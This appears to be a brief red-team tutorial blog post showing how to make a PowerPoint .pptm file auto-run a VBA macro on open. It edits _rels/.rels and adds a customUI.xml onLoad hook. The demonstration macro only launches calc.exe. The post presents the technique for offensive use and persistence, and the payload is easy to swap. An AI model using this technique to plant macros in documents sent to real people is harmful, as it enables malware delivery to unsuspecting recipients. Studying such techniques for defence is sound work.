Home

Published

- 2 min read

Abusing Macros in Powerpoint Presentations

offensive security redteam cybersecurity persistence
img of Abusing Macros in Powerpoint Presentations

This blog post will cover how to execute a payload on opening a powerpoint presentation.

Activating Developer Options

For the first step, we need to open our powerpoint presentation, then open the options and add the DEVELOPER Tab if it isn’t already there.

Adding The Macro

In the developer tab, we click the Visual Basic button on the far left and that will open up a new window. Next, we go to Insert>Module and here we can add in our macros. For example we will execute calc.exe:

VBA
   Sub OpenCalc()
    Dim calcPath As String
    calcPath = "C:\Windows\System32\calc.exe"
    Shell calcPath, vbNormalFocus
End Sub

Now we save the powerpoint as a .pptm file NOT a .pptx and close the presentation.

Editing The File

Next, we will unzip the powerpoint file, then we edit the _rels/.rels file to add this line right before the last </Relationships>:

xml
   <Relationship Type="http://schemas.microsoft.com/office/2006/relationships/ui/extensibility" Target="/customUI/customUI.xml" Id="Rd6e72c29d34a427e" />

Our full code should now look like this:

xml
   <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/thumbnail" Target="docProps/thumbnail.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="ppt/presentation.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Type="http://schemas.microsoft.com/office/2006/relationships/ui/extensibility" Target="/customUI/customUI.xml" Id="Rd6e72c29d34a427e" /></Relationships>

Now we will create a new directory named customUI on the same level as the _rels directory.

And create a file named customUI.xml in this new directory and adding the following code to that file:

xml
   <customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui"
onLoad="OpenCalc" > <!--Replace "OpenCalc" with the name of your own macro IF you used your own macro.-->
</customUI>

We’re Already Finished!

We just zip our files back up and make sure we name it with a .pptm extension. Our macros should now run upon opening the powerpoint (once we enable macros).

Sources

This guest article was provided by our trainee, which we proudly present. It was made autonomously and with only minimal help / a few cosmetic updates.